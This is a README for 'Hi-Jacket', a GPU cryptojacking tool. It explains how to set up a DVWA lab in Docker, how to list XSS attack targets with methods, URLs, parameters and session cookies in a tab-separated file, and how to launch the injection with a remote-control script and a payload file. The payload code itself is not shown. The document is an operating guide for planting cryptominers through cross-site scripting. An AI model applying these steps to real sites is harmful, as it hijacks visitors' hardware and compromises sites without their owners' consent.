Hi-Jacket - A GPU cryptojacker script
First of all clone the repository
git clone https://github.com/ZappaBoy/hi-jacket.git
cd hi-jacketRun the testing enviroment through docker-compose.
cd ./remote-control
chmod +x ./run-test-environment.sh
./run-test-environment.shThis will run a DVWA instance with its mysql database in two containers.
After this, it will automatically run the dispatcher server (dispatcher.py).
Before running the remote control you need to define the attack targets in the remote-control/sites-urls.txt.
Simply edit the file using tabs as spacer:
- Insert in the first column the attack method, you can choose between
GETPOSTALLAUTODEFAULT; - In the second column insert the base url of the attack;
- In the third column insert the string prams for the
GETmethods and the body for thePOSTone; - (optional) In the last column you can insert the cookies such as the
PHPSESSID.
You can also use the hashtag (#) to comment a line and avoid the execution of the attack on that target. Here is an example:
GET http://xss-game.appspot.com /level1/frame?query=XSS
POST http://localhost:8060/vulnerabilities/xss_s/index.php txtName=hijacked&mtxMessage=XSS&btnSign=Sign+Guestbook PHPSESSID=YOURPHPSESSID;security=low
ALL http://localhost:8060/vulnerabilities/xss_s/index.php
AUTO http://xss-game.appspot.com /level1/frame?query=XSS
DEFAULT http://xss-game.appspot.com /level1/frame?query=XSS
# This is a comment. The following line is ignored.
# GET http://xss-game.appspot.com /level1/frame?query=XSSOnce defined the targets you can run the attack using the remote-control.sh
chmod +x ./remote-control.sh
./remote-control.sh -s -i -p very-danger-payload.txt